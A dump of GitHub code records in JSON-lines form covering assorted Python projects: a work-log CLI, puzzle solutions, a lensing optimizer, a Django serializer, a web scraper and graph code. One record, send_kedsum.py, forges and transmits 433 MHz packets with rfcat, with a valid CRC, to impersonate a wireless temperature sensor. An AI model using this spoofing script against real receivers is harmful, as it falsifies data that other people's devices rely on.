q] Quit')\r\n action = input('>').lower().strip()\r\n if action in menu:\r\n clear_screen()\r\n menu[action]()\r\n\r\n\r\nmenu = OrderedDict([\r\n ('a', add_entry),\r\n ('s', sub_menu)])\r\ns_menu = OrderedDict([\r\n ('a', search_by_date),\r\n ('b', search_by_date_range),\r\n ('c', search_employee_name),\r\n ('d', search_task_name),\r\n ('e', search_time_spent),\r\n ('f', search_notes)])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main_menu()\r\n","repo_name":"OzRayan/Work_Log_Database","sub_path":"work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31624647378","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nk = int(input())\nx,y = map(int,input().split())\n\nif((x+y)%2==1)&(k%2==0):\n print(-1)\n exit()\n\nif(k==1):\n print(x+y)\n a = 0\n b = 0\n while(a!=x):\n a += 1 * ((x>0)*2-1)\n print(' '.join(map(str, [a,b])))\n while(b!=y):\n b += 1 * ((y>0)*2-1)\n print(' '.join(map(str, [a,b])))\n exit()\n\nif(k==2):\n print((x+y)//2)\n a = 0\n b = 0\n if(x%2==1):\n a = (x>0)*2-1\n b = (y>0)*2-1\n print(' '.join(map(str, [a,b])))\n while(a!=x):\n a += 2 * ((x>0)*2-1)\n print(' '.join(map(str, [a,b])))\n while(b!=y):\n b += 2 * ((y>0)*2-1)\n print(' '.join(map(str, [a,b])))\n exit()\n\nsum_xy = x+y\ndif_xy = x-y\n\ndef print_ans():\n print(len(steps)-1)\n for tmp in steps[-2::-1]:\n a,b = tmp\n print(' '.join(map(str, [(a+b)//2, (a-b)//2])))\n\nsteps = []\nsteps.append([sum_xy,dif_xy])\n\n# cnt = 0\n# cnt += 1\n# if(cnt>10):\n# print(steps)\n# exit()\n\nwhile((sum_xy%k)!=0):\n if((k%2==1)&( (abs(sum_xy)%k)%2 ==0)):\n if(sum_xy > 0):\n sum_xy -= k-2\n else:\n sum_xy += k-2\n else:\n if(sum_xy > 0):\n sum_xy -= (sum_xy%k)\n else:\n sum_xy -= (sum_xy%k) - k\n\n dif_xy -= k * ((dif_xy>0)*2-1)\n steps.append([sum_xy, dif_xy])\n\nif(sum_xy==0)&(dif_xy==0):\n print_ans()\n exit()\n\nwhile(dif_xy%k!=0):\n if((k%2==1)&( (abs(dif_xy)%k)%2 ==0)):\n if(dif_xy > 0):\n dif_xy -= k-2\n else:\n dif_xy += k-2\n else:\n if(dif_xy > 0):\n dif_xy -= (dif_xy%k)\n else:\n dif_xy -= (dif_xy%k) - k\n\n sum_xy -= k * ((sum_xy>0)*2-1)\n steps.append([sum_xy, dif_xy])\n\n\nwhile(sum_xy!=0)|(dif_xy!=0):\n if((abs(sum_xy)==k)&(dif_xy==0))|((dif_xy==0)&(abs(dif_xy==k))):\n sum_xy = 0\n dif_xy = 0\n steps.append([sum_xy, dif_xy])\n break\n\n sum_xy -= k * ((sum_xy>0)*2-1)\n dif_xy -= k * ((dif_xy>0)*2-1)\n steps.append([sum_xy, dif_xy])\n\nprint_ans()\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc135_old/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6916338335","text":"import turtle\nimport random\n\nturtle.setup(900, 900)\nturtle.shape(\"classic\")\nturtle.color(\"#E96479\")\nturtle.bgcolor('#4D455D')\nturtle.width(2)\n\n# Перемещаемся на случайную точку для начала рисунка\nturtle.penup()\nturtle.goto(random.randint(-350, 350), random.randint(-350, 350))\nturtle.pendown()\n\n# Напишем функцию для рисования квадрата\n\n\ndef draw_square():\n turtle.begin_fill()\n # Рисуем квадрат со стороной side\n side = random.randint(10, 100)\n for i in range(4):\n turtle.forward(side)\n turtle.left(90)\n\n turtle.end_fill()\n\n\n# Приступаем к созданию картины\n\nn = 10 # Количество квадратов\n\nfor i in range(n-1):\n draw_square()\n turtle.goto(random.randint(-350, 350), random.randint(-350, 350))\n\n\ndraw_square()\n# Прячем черепашку\nturtle.hideturtle()\n\n# Основной цикл\nturtle.mainloop()\n","repo_name":"aleksmn/PythonLessons","sub_path":"module-1/turtle-demo/abstract_1.py","file_name":"abstract_1.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31022821707","text":"from calculadora import Calculadora\n\n\nclass CalculadoraDecorada:\n def __init__(self, calculadora):\n self.calculadora = calculadora\n\n def converterNumero(self, numero):\n if not isinstance(numero, str):\n return numero\n return {\n \"um\": 1, \"dois\": 2, \"três\": 3, \"quatro\": 4, \"cinco\": 5,\n \"seis\": 6, \"sete\": 7, \"oito\": 8, \"nove\": 9, \"dez\": 10,\n }.get(numero)\n\n def soma(self, x, y):\n return self.calculadora.soma(\n self.converterNumero(x),\n self.converterNumero(y),\n )\n\n\ncalculadora = Calculadora()\ncalculadora_decorada = CalculadoraDecorada(calculadora)\nprint(calculadora_decorada.soma(2, 3))\nprint(calculadora_decorada.soma('um', 'oito'))\n","repo_name":"dabcsouza/trybe-exercicios","sub_path":"ciencia-da-computacao/bloco-34-padroes-de-projeto/dia-03-padroes-decorator-observer-factory/example/calculadora_decorada.py","file_name":"calculadora_decorada.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19743350532","text":"from MagniPy.util import chi_square_img\nimport numpy as np\nfrom MagniPy.util import interpolate_ray_paths\n\ndef split_realization(datatofit, realization):\n\n foreground = realization.filter(datatofit.x, datatofit.y, mindis_front=10,\n mindis_back=0, logmasscut_front=0,\n logabsolute_mass_cut_front=0,\n logmasscut_back=20,\n logabsolute_mass_cut_back=20)\n\n background = realization.filter(datatofit.x, datatofit.y, mindis_front=0,\n mindis_back=10, logmasscut_front=20,\n logabsolute_mass_cut_front=20,\n logmasscut_back=0,\n logabsolute_mass_cut_back=0)\n\n return foreground, background\n\ndef optimize_foreground(macromodel, realizations, datatofit,tol_source,tol_mag, tol_centroid, centroid_0, n_particles, n_iterations,\n source_shape, source_size_kpc, polar_grid, optimizer_routine, re_optimize, verbose, particle_swarm, restart, constrain_params, pso_convergence_mean, pso_compute_magnification, tol_simplex_params,\n tol_simplex_func, simplex_n_iter, solver_class, LOS_mass_sheet_front, LOS_mass_sheet_back, centroid, satellites,\n check_foreground_fit, foreground_aperture_masses, foreground_globalmin_masses, foreground_filters, \\\n reoptimize_scale, particle_swarm_reopt):\n\n #foreground_aperture_masses, foreground_globalmin_masses, foreground_filters, \\\n #reoptimize_scale, particle_swarm_reopt = foreground_mass_filters(m_ref, LOS_mass_sheet_front)\n\n source_x, source_y = 0, 0\n\n for h in range(0, len(foreground_filters)):\n\n optimizer_kwargs = {'save_background_path': True, 're_optimize_scale': reoptimize_scale[h]}\n\n if h == 0:\n\n realization_filtered = realizations[0].filter(datatofit.x, datatofit.y, mindis_front=foreground_filters[h],\n mindis_back=1, source_x = source_x, source_y=source_y,\n logmasscut_front=foreground_globalmin_masses[h],\n logabsolute_mass_cut_front = foreground_aperture_masses[h],\n logmasscut_back=12,\n logabsolute_mass_cut_back=12, centroid = centroid, zmax=solver_class.zmain)\n if verbose:\n print('initial optimization')\n\n else:\n\n macromodel = model[0].lens_components[0]\n re_optimize = True\n particle_swarm = particle_swarm_reopt[h]\n optimizer_kwargs.update({'re_optimize_scale': reoptimize_scale[h]})\n\n real = realizations[0].filter(datatofit.x, datatofit.y, mindis_front=foreground_filters[h],\n source_x = source_x, source_y=source_y,\n logmasscut_front=foreground_globalmin_masses[h], logmasscut_back=12, ray_x=out_kwargs['path_x'],\n ray_y=out_kwargs['path_y'], logabsolute_mass_cut_back=12,\n path_redshifts=out_kwargs['path_redshifts'],\n path_Tzlist=out_kwargs['path_Tzlist'],\n logabsolute_mass_cut_front = foreground_aperture_masses[h], zmax=solver_class.zmain)\n\n if verbose:\n print('optimization '+str(h+1))\n\n realization_filtered = real.join(realization_filtered)\n\n N_foreground_halos = len(realization_filtered.masses[np.where(realization_filtered.redshifts <= solver_class.zmain)])\n\n if verbose:\n print('nhalos: ', len(realization_filtered.halos))\n print('aperture size: ', foreground_filters[h])\n print('minimum mass in aperture: ', foreground_aperture_masses[h])\n print('minimum global mass: ', foreground_globalmin_masses[h])\n print('N foreground halos: ', N_foreground_halos)\n\n do_optimization = True\n if h > 0:\n if N_foreground_halos == 0:\n do_optimization = False\n if N_foreground_halos == N_foreground_halos_last:\n do_optimization = False\n\n if do_optimization:\n\n lens_system = solver_class.build_system(main=macromodel, realization=realization_filtered, multiplane=True,\n LOS_mass_sheet_front=LOS_mass_sheet_front,\n LOS_mass_sheet_back=LOS_mass_sheet_back, satellites=satellites)\n\n optimized_data, model, out_kwargs, keywords_lensmodel = solver_class._optimize_4imgs_lenstronomy([lens_system],\n data2fit=datatofit,\n tol_source=tol_source,\n tol_mag=tol_mag,\n tol_centroid=tol_centroid,\n centroid_0=centroid_0,\n n_particles=n_particles,\n n_iterations=n_iterations,\n source_shape=source_shape,\n source_size_kpc=source_size_kpc,\n return_ray_path=True,\n polar_grid=polar_grid,\n optimizer_routine=optimizer_routine,\n verbose=verbose,\n re_optimize=re_optimize,\n particle_swarm=particle_swarm,\n restart=restart,\n constrain_params=constrain_params,\n pso_convergence_mean=pso_convergence_mean,\n pso_compute_magnification=pso_compute_magnification,\n tol_simplex_params=tol_simplex_params,\n tol_simplex_func=tol_simplex_func,\n simplex_n_iter=simplex_n_iter,\n optimizer_kwargs=optimizer_kwargs,\n finite_source_magnification=False,\n chi2_mode='source', adaptive_grid=False)\n\n source_x, source_y = keywords_lensmodel['source_x'], keywords_lensmodel['source_y']\n foreground_rays = out_kwargs['precomputed_rays']\n foreground_macromodel = model[0].lens_components[0]\n N_foreground_halos_last = N_foreground_halos\n\n else:\n model[0].realization = realization_filtered\n foreground_macromodel = model[0].lens_components[0]\n\n if check_foreground_fit:\n\n if chi_square_img(datatofit.x, datatofit.y, optimized_data[0].x, optimized_data[0].y, 0.003) >= 1:\n return None, None, None, None, None\n\n return foreground_rays, foreground_macromodel, [realization_filtered], keywords_lensmodel, optimized_data\n\ndef optimize_background(macromodel, realization_foreground, realization_background, foreground_rays, source_x, source_y, datatofit, tol_source, tol_mag, tol_centroid, centroid_0, n_particles,\n n_iterations, source_shape, source_size_kpc, polar_grid, optimizer_routine, re_optimize, verbose,\n particle_swarm, restart, constrain_params, pso_convergence_mean, pso_compute_magnification,\n tol_simplex_params, tol_simplex_func, simplex_n_iter, solver_class,\n background_globalmin_masses = None, background_aperture_masses = None, background_filters = None,\n reoptimize_scale = None, optimize_iteration = None, particle_swarm_reopt = None,\n LOS_mass_sheet_front = 7.7, LOS_mass_sheet_back = 8, centroid = None, satellites = None,\n ):\n\n assert len(background_filters) == len(background_aperture_masses)\n assert len(background_globalmin_masses) == len(background_filters)\n\n N_iterations = len(background_filters)\n backx, backy, background_Tzs, background_zs, reoptimized_realizations = [], [], [], [], []\n\n for h in range(0, N_iterations):\n if verbose:\n print('iterating ' + str(h + 1) + ' of ' + str(N_iterations) + '... ')\n\n if h == 0:\n\n if verbose:\n print('initial background optimization')\n\n optimizer_args = {'save_background_path': True,\n 're_optimize_scale': reoptimize_scale[h],\n 'precomputed_rays': foreground_rays}\n\n ray_x_interp, ray_y_interp = \\\n interpolate_ray_paths(datatofit.x, datatofit.y, lens_model, kwargs_lens, zsource)\n filter_kwargs = {'aperture_radius_front': 10.,\n 'aperture_radius_back': background_filters[h],\n 'aperture_front_min_logmass': 10.,\n 'aperture_back_min_logmass': background_aperture_masses[h],\n 'global_front_min_logmass': 10.,\n 'global_back_min_logmass': background_globalmin_masses[h],\n 'interpolated_x_angle': ray_x_interp,\n 'interpolated_y_angle': ray_y_interp,\n 'zmax': self.zlens\n }\n\n filtered_background = realization_background.filter(datatofit.x, datatofit.y, mindis_front=0,\n mindis_back=background_filters[h], logmasscut_front=12,\n logabsolute_mass_cut_front=12, source_x=source_x, source_y=source_y,\n logmasscut_back=background_globalmin_masses[h],\n logabsolute_mass_cut_back=background_aperture_masses[h],\n zmin=solver_class.zmain)\n\n realization_filtered = realization_foreground.join(filtered_background)\n\n else:\n\n macromodel = model[0].lens_components[0]\n re_optimize = True\n particle_swarm = particle_swarm_reopt[h]\n optimizer_args.update({'re_optimize_scale': reoptimize_scale[h]})\n #optimizer_args.update({'save_background_path': True})\n #optimizer_args.update({'precomputed_rays': foreground_rays})\n\n filtered_background = realization_background.filter(datatofit.x, datatofit.y, mindis_front=0,\n logmasscut_front=12, mindis_back = background_filters[h],\n source_x=source_x, source_y=source_y, logmasscut_back=background_globalmin_masses[h],\n logabsolute_mass_cut_back=background_aperture_masses[h],\n logabsolute_mass_cut_front=12, zmin=solver_class.zmain)\n\n realization_filtered = realization_filtered.join(filtered_background)\n\n # realization_filtered = realizations[0].realization_from_indicies(np.squeeze(filter_indicies))\n N_background_halos = len(realization_filtered.masses[np.where(realization_filtered.redshifts > solver_class.zmain)])\n realization_filtered = realization_filtered.shift_background_to_source(source_x, source_y)\n if verbose:\n print('N foreground halos: ', len(realization_filtered.masses[np.where(realization_filtered.redshifts <= solver_class.zmain)]))\n print('N background halos: ', N_background_halos)\n print('N total: ', len(realization_filtered.masses))\\\n\n print('aperture size: ', background_filters[h])\n print('minimum mass in aperture: ', background_aperture_masses[h])\n print('minimum global mass: ', background_globalmin_masses[h])\n\n do_optimization = True\n\n if h > 0:\n if N_background_halos == 0:\n do_optimization = False\n if N_background_halos == N_background_halos_last:\n do_optimization = False\n #print(optimize_iteration[h])\n if optimize_iteration[h] is False:\n do_optimization = False\n\n if do_optimization:\n\n lens_system = solver_class.build_system(main=macromodel, realization=realization_filtered,\n multiplane=True, LOS_mass_sheet_front = LOS_mass_sheet_front,\n LOS_mass_sheet_back = LOS_mass_sheet_back, satellites=satellites)\n\n optimized_data, model, out_kwargs, keywords_lensmodel = solver_class._optimize_4imgs_lenstronomy([lens_system],\n data2fit=datatofit,tol_source=tol_source,\n tol_mag=tol_mag,\n tol_centroid=tol_centroid,\n centroid_0=centroid_0,\n n_particles=n_particles,\n n_iterations=n_iterations,\n source_shape=source_shape,\n source_size_kpc=source_size_kpc,\n return_ray_path=True,\n polar_grid=polar_grid,\n optimizer_routine=optimizer_routine,\n verbose=verbose,\n re_optimize=re_optimize,\n particle_swarm=particle_swarm,\n restart=restart,\n constrain_params=constrain_params,\n pso_convergence_mean=pso_convergence_mean,\n pso_compute_magnification=pso_compute_magnification,\n tol_simplex_params=tol_simplex_params,\n tol_simplex_func=tol_simplex_func,\n simplex_n_iter=simplex_n_iter,\n optimizer_kwargs=optimizer_args,\n finite_source_magnification=False,\n chi2_mode='source', adaptive_grid=False)\n\n # path_x, path_y, path_redshifts, path_Tzlist = out_kwargs['path_x'], out_kwargs['path_y'], \\\n # out_kwargs['path_redshifts'], out_kwargs[\n # 'path_Tzlist']\n # source_x, source_y = keywords_lensmodel['source_x'], keywords_lensmodel['source_y']\n # backx.append(path_x)\n # backy.append(path_y)\n # background_Tzs.append(path_Tzlist)\n # background_zs.append(path_redshifts)\n reoptimized_realizations.append(realization_filtered)\n N_background_halos_last = N_background_halos\n\n else:\n model[0].realization = realization_filtered\n reoptimized_realizations.append(realization_filtered)\n\n\n return optimized_data, model, \\\n (backx, backy, background_Tzs, background_zs, reoptimized_realizations), keywords_lensmodel\n\ndef foreground_mass_filters(realization, LOS_mass_sheet):\n\n nhalos = len(realization.halos)\n\n if nhalos <= 500:\n\n foreground_aperture_masses = [LOS_mass_sheet, 0]\n foreground_globalmin_masses = [LOS_mass_sheet, LOS_mass_sheet]\n foreground_filters = [10, 0.4]\n reoptimize_scale = [1, 0.5]\n particle_swarm_reopt = [True, False]\n\n else:\n\n foreground_aperture_masses = [LOS_mass_sheet, 7, 0]\n foreground_globalmin_masses = [LOS_mass_sheet, LOS_mass_sheet, LOS_mass_sheet]\n foreground_filters = [10, 0.3, 0.1]\n reoptimize_scale = [1, 0.5, 0.5]\n particle_swarm_reopt = [True, True, False]\n\n return foreground_aperture_masses, foreground_globalmin_masses, foreground_filters, \\\n reoptimize_scale, particle_swarm_reopt\n\ndef background_mass_filters(realization, LOS_mass_sheet):\n\n rung_0_mass = LOS_mass_sheet\n rung_0_window = 10\n\n background_aperture_masses = [rung_0_mass]\n background_globalmin_masses = [rung_0_mass]\n background_filters = [rung_0_window]\n reoptimize_scale = [0.4]\n particle_swarm_reopt = [True]\n optimize_iteration = [True]\n\n rung_1_mass = 7.5\n rung_2_mass = 7\n rung_3_mass = 0\n rung_1_window = 0.4\n rung_2_window = 0.3\n rung_3_window = 0.075\n\n nhalos_large = np.sum(realization.masses > 10**7)\n\n if nhalos_large > 150:\n background_aperture_masses += [rung_1_mass, rung_2_mass, rung_3_mass]\n background_globalmin_masses += [rung_0_mass, rung_0_mass, rung_0_mass]\n background_filters += [rung_1_window, rung_2_window, rung_3_window]\n reoptimize_scale += [0.5, 0.4, 0.15]\n particle_swarm_reopt += [False, False, False]\n optimize_iteration += [True, True, False]\n\n else :\n background_aperture_masses += [rung_2_mass, rung_3_mass]\n background_globalmin_masses += [rung_0_mass, rung_0_mass]\n background_filters += [rung_1_window, 0.25]\n reoptimize_scale += [0.5, 0.5]\n particle_swarm_reopt += [False, False]\n optimize_iteration += [True, False]\n\n\n return background_aperture_masses, background_globalmin_masses, background_filters, \\\n reoptimize_scale, particle_swarm_reopt, optimize_iteration\n\n","repo_name":"dangilman/MagniPy","sub_path":"MagniPy/Solver/hierarchical_optimization.py","file_name":"hierarchical_optimization.py","file_ext":"py","file_size_in_byte":20454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28897971877","text":"# https://leetcode.com/problems/longest-palindrome/\n# https://leetcode.com/problems/longest-palindrome/discuss/89587/What-are-the-odds-(Python-and-C%2B%2B)\n\nimport collections\n\n\n# first thought, TC:O(n), SC:O(n)\ndef longestPalindrome(s: str) -> int:\n # TC: O(n)\n counter = collections.Counter(s)\n res = 0\n for v in counter.values():\n if v % 2 == 0:\n res += v\n else:\n res += v - 1\n return min(res + 1, len(s)) if res % 2 == 0 else res\n\n\ndef longestPalindrome2(s: str) -> int:\n counter = collections.Counter(s)\n odd = sum([v&1 for v in counter.values()])\n ## +1 only when odd number existing (odd>0)\n return len(s) - odd + (odd>0)","repo_name":"ychanc2104/LeetCode","sub_path":"Longest Palindrome.py","file_name":"Longest Palindrome.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8709683318","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nfrom rflib import *\nfrom struct import *\nimport rflib\nimport bitstring\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('temperature', type=float, help='temperature in °C')\nparser.add_argument('humidity', type=int, help='humidity in %rH')\n\nargs = parser.parse_args()\n\ntemp = args.temperature\nhum = args.humidity\nid = 156\nbatt = 2\nch = 0\n\nprint(\"About to send: {}°C at {} %rH (Batt:{}, CH:{})\".format(temp,hum,batt,ch))\n\ndef crc4(msg):\n remainder = 0\n poly = 0x3 << 4\n bit = 0\n\n for x in range(4):\n remainder ^= msg[x]\n for bit in range(8):\n if remainder & 0x80:\n remainder = (remainder << 1) ^ poly\n else:\n remainder = (remainder << 1)\n return remainder >> 4 & 0x0f\n\ndef tx(msg):\n d=RfCat()\n d.setModeIDLE()\n while (d.getMARCSTATE()[1] not in (MARC_STATE_IDLE,)):\n pass\n\n d.setFreq(433920000)\n d.setMdmModulation(MOD_ASK_OOK)\n d.setMdmDRate(2600)\n d.setMdmChanBW(250000)\n d.setMdmSyncMode(SYNCM_NONE)\n\n # Split into 256 byte chunks\n for i in [rf_data[i:i+255] for i in range(0, len(rf_data), 255)]:\n print(\"Sending chunk with len {}\".format(len(i)))\n d.RFxmit(i)\n\ntemp_f = (temp * 9/5) + 32\ntemp_raw = int(temp_f * 10 + 900)\ntl = temp_raw & 0x0f\ntm = (temp_raw & 0xf0) >> 4\nth = (temp_raw & 0xf00) >> 8\nhl = hum & 0x0f\nhh = (hum & 0xf0) >> 4\nflags = '1000'\n\ndata = '{:08b}{:02b}{:02b}{:04b}{:04b}{:04b}{:04b}{:04b}{:4}'.format(id, batt, ch, tl, tm, th, hl, hh, flags)\n\n# create \"raw data\" byte array to calculate checksum\ncrc_data = bitstring.BitArray(bin=data).tobytes()\ncrc = crc4(crc_data) ^(crc_data[4] >> 4)\ndata_w_crc = \"{:2}{:36}{:04b}\".format(\"00\", data, crc)\n\n# Convert the data to a PWM\npwm_data = ''.join(['10000000000' if b == '1' else '100000' for b in data_w_crc])\n\n# Assemble the final bit stream\npreamble = '100000000000000000000'\nfinal_data = (preamble * 15)\nfinal_data += ((pwm_data + preamble + preamble) * 5)\nfinal_data += pwm_data\n\n# Convert the final bit stream to bytes\nrf_data = bitstring.BitArray(bin=final_data).tobytes()\ntx(rf_data)\n","repo_name":"b00lduck/433mhz_thermo_spoof","sub_path":"send_kedsum.py","file_name":"send_kedsum.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8825479754","text":"from rest_framework import serializers\nfrom django.db.models import F, Sum\nfrom api.funds.models import Fund, FundInterest\nfrom api.analytics.models import EntityAction, EntityStats\nfrom datetime import date\n\n\nclass AnalyticsEntityActionSerializer(serializers.ModelSerializer):\n class Meta:\n model = EntityAction\n fields = '__all__'\n extra_kwargs = {\n 'user': {'read_only': True},\n 'company': {'read_only': True},\n 'module': {'read_only': True}\n }\n\n def save(self):\n validated_data = self.validated_data\n company = self.get_company(validated_data['entity'], validated_data['entity_id'])\n module = self.get_module(validated_data['entity'])\n # using get_or_create and an explicit save instead of create_or_update because\n # update would not allow us to use a Field expression to increment the\n # view_count\n entity_action, created = EntityAction.objects.get_or_create(\n module=module,\n entity=validated_data['entity'],\n entity_id=validated_data['entity_id'],\n user_action=validated_data['user_action'],\n user=self.context['request'].user.associated_company_users.filter(company=company).first(),\n company_id=company.id,\n )\n\n entity_action.view_count = F(\"view_count\") + 1\n entity_action.save(update_fields=[\"view_count\"])\n\n return entity_action\n\n @staticmethod\n def get_module(entity_type):\n if entity_type == EntityAction.Entity.FUND:\n return EntityAction.Module.INVESTMENTS\n\n raise serializers.ValidationError(\"Invalid Entity Type\")\n\n @staticmethod\n def get_company(entity_type, entity_id):\n if entity_type == EntityAction.Entity.FUND:\n fund = Fund.objects.get(id=entity_id)\n return fund.company\n\n raise serializers.ValidationError(\"Invalid Entity Type and Entity Id\")\n\n\nclass AnalyticsFundInterestSerializer(serializers.ModelSerializer):\n visited_fund_page = serializers.SerializerMethodField()\n visited_interest_page = serializers.SerializerMethodField()\n submitted_interest_form = serializers.SerializerMethodField()\n indication_of_interest_start = serializers.SerializerMethodField()\n indication_of_interest_end = serializers.SerializerMethodField()\n total_equity_investment = serializers.SerializerMethodField()\n total_leverage_requested = serializers.SerializerMethodField()\n answer_details = serializers.SerializerMethodField()\n\n class Meta:\n model = Fund\n fields = ['total_equity_investment','total_leverage_requested','visited_fund_page',\n 'visited_interest_page', 'submitted_interest_form', 'indication_of_interest_start',\n 'indication_of_interest_end', 'answer_details']\n\n\n def get_visited_fund_page(self, obj: Fund):\n return EntityStats().count_visited_fund_page(obj)\n\n\n def get_visited_interest_page(self, obj: Fund):\n return EntityStats().count_visited_interest_page(obj)\n\n @staticmethod\n def get_submitted_interest_form(obj: Fund):\n return FundInterest.objects.filter(fund=obj).count()\n\n @staticmethod\n def get_indication_of_interest_start(obj: Fund):\n return date.today()\n\n @staticmethod\n def get_indication_of_interest_end(obj: Fund):\n return date.today()\n\n @staticmethod\n def get_total_equity_investment(obj: Fund):\n return FundInterest.objects.filter(fund=obj).aggregate(sum=Sum('equity_amount'))['sum']\n\n @staticmethod\n def get_total_leverage_requested(obj: Fund):\n return FundInterest.objects.filter(fund=obj).aggregate(sum=Sum('leverage_amount'))['sum']\n\n @staticmethod\n # Returns a sorted dictionary of questions and answers with the count for\n # each answer.\n def get_answer_details(obj: Fund):\n submissions = FundInterest.objects.all().filter(fund=obj)\n results_by_question = {}\n for submission in submissions:\n details = submission.interest_details\n for question, answer in details.items():\n if not isinstance(answer, dict):\n continue\n\n answers = results_by_question.get(question, {})\n answer_value = answer['value']\n count = answers.get(answer_value, 0)\n answers[answer_value] = count + 1\n results_by_question[question] = answers\n\n return dict(sorted(results_by_question.items()))\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/analytics/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14136257982","text":"from urllib import request\r\nimport re\r\nfrom urllib import error\r\n\r\n\r\nclass Spider():\r\n url = 'https://book.douban.com/top250?start=0'\r\n root_pattern = '
([\\s\\S]*?)
'\r\n url_pattern = r'' \r\n div_pattern = '
([\\s\\S]*?)
'\r\n name_pattern = r'(.*?)'\r\n writer_pattern = r'作者.*?
.*?(.*?)'\r\n pub_house_pattern = r'出版社.*?.*?(.*?)
'\r\n pub_company_pattern = r'出品方.*?.*?>(.*?)'\r\n origin_name_pattern = r'原作名.*? (.*?)
'\r\n interpreter_pattern = r'译者.*?.*?(.*?)'\r\n pub_time_pattern = r'出版年.*? (.*?)
'\r\n page_num_pattern = r'页数.*? (.*?)
'\r\n price_pattern = r'定价.*? (.*?)
'\r\n bind_pattern = r'装帧.*? (.*?)
'\r\n ISBN_pattern = r'ISBN.*? (.*?)
'\r\n content_pattern = r'
(.*?)
'\r\n def __fetch_content(self,url):\r\n try:\r\n r = request.urlopen(url)\r\n # bytes\r\n htmls = r.read()\r\n htmls = str(htmls, encoding = 'utf-8')\r\n return htmls\r\n except Exception as e:\r\n print(e)\r\n print('此页为空!')\r\n \r\n def __analysis_url(self,htmls):\r\n sub_urls = []\r\n web_html = re.findall(Spider.root_pattern, htmls)\r\n for html in web_html:\r\n sub_url = re.findall(Spider.url_pattern,html,re.S)[0]\r\n sub_urls.append(sub_url)\r\n return sub_urls\r\n\r\n def __analysis_web(self,url):\r\n sub_info = {}\r\n htmls = self.__fetch_content(url)\r\n if not htmls:\r\n return None\r\n name = self.__handle(Spider.name_pattern,htmls)\r\n content = self.__handle(Spider.content_pattern,htmls)\r\n sub_info['作品'] = name\r\n info_html = re.findall(Spider.div_pattern, htmls) \r\n for html in info_html:\r\n # print(html)\r\n writer = self.__handle(Spider.writer_pattern,html)\r\n pub_house = self.__handle(Spider.pub_house_pattern,html)\r\n pub_company = self.__handle(Spider.pub_company_pattern,html)\r\n origin_name = self.__handle(Spider.origin_name_pattern,html)\r\n interpreter = self.__handle(Spider.interpreter_pattern,html)\r\n pub_time = self.__handle(Spider.pub_time_pattern,html)\r\n page_num = self.__handle(Spider.page_num_pattern,html)\r\n price = self.__handle(Spider.price_pattern,html)\r\n bind = self.__handle(Spider.bind_pattern,html)\r\n ISBN = self.__handle(Spider.ISBN_pattern,html)\r\n sub_info['作者'] = writer\r\n sub_info['出版社'] = pub_house\r\n sub_info['出品方'] = pub_company\r\n sub_info['原作名'] = origin_name\r\n sub_info['译者'] = interpreter\r\n sub_info['出版年'] = pub_time\r\n sub_info['页数'] = page_num \r\n sub_info['定价'] = price\r\n sub_info['装帧'] = bind\r\n sub_info['ISBN'] = ISBN\r\n sub_info['内容简介'] = content\r\n a = 1\r\n return sub_info \r\n def __handle(self,pattern,s):\r\n result = re.findall(pattern,s,re.S)\r\n if not result:\r\n return ''\r\n else:\r\n result = re.findall(pattern,s,re.S)[0].strip()\r\n result = result.replace(' ','')\r\n result = result.replace('\\n','')\r\n result = result.replace('

','')\r\n result = result.replace('

','')\r\n return result\r\n\r\n def __change_page(self, n):\r\n url = 'https://book.douban.com/top250?start='+str(n)\r\n return url\r\n \r\n def __show(self,infos):\r\n for x in range(0,len(infos)):\r\n print(\"排名\"+str(x+1)+':')\r\n for key,value in infos[x].items():\r\n print('{key}:{value}'.format(key = key, value = value))\r\n\r\n def go(self):\r\n infos = []\r\n for x in range(0,226,25):\r\n url = self.__change_page(x)\r\n htmls = self.__fetch_content(url)\r\n sub_urls = self.__analysis_url(htmls)\r\n for sub_url in sub_urls:\r\n info =self.__analysis_web(sub_url)\r\n if not info:\r\n continue\r\n infos.append(info)\r\n self.__show(infos)\r\n return infos\r\n\r\nspider = Spider()\r\nspider.go()\r\n","repo_name":"fengbo19890926/spider_doubanBook250","sub_path":"spider_db.py","file_name":"spider_db.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28621722370","text":"from collections import defaultdict\n# visited=[False for _ in range(4)]\nclass Graph:\n def __init__(self):\n self.graph=defaultdict(list)\n def addEdge(self,u,v):\n self.graph[u].append(v)\n\n \n \"\"\" \n def DFS(self,s):\n visited[s]=True\n for i in self.graph[s]:\n if not visited[i]:\n self.DFS(i)\n print(i)\n \"\"\"\n\n def DFSRec(self,curr,visited):\n visited[curr]=True\n print (curr)\n for i in self.graph[curr]:\n if not visited[i]:\n self.DFSRec(i,visited)\n \n def DFS(self,s):\n visited=[False for _ in range(len(self.graph))]\n 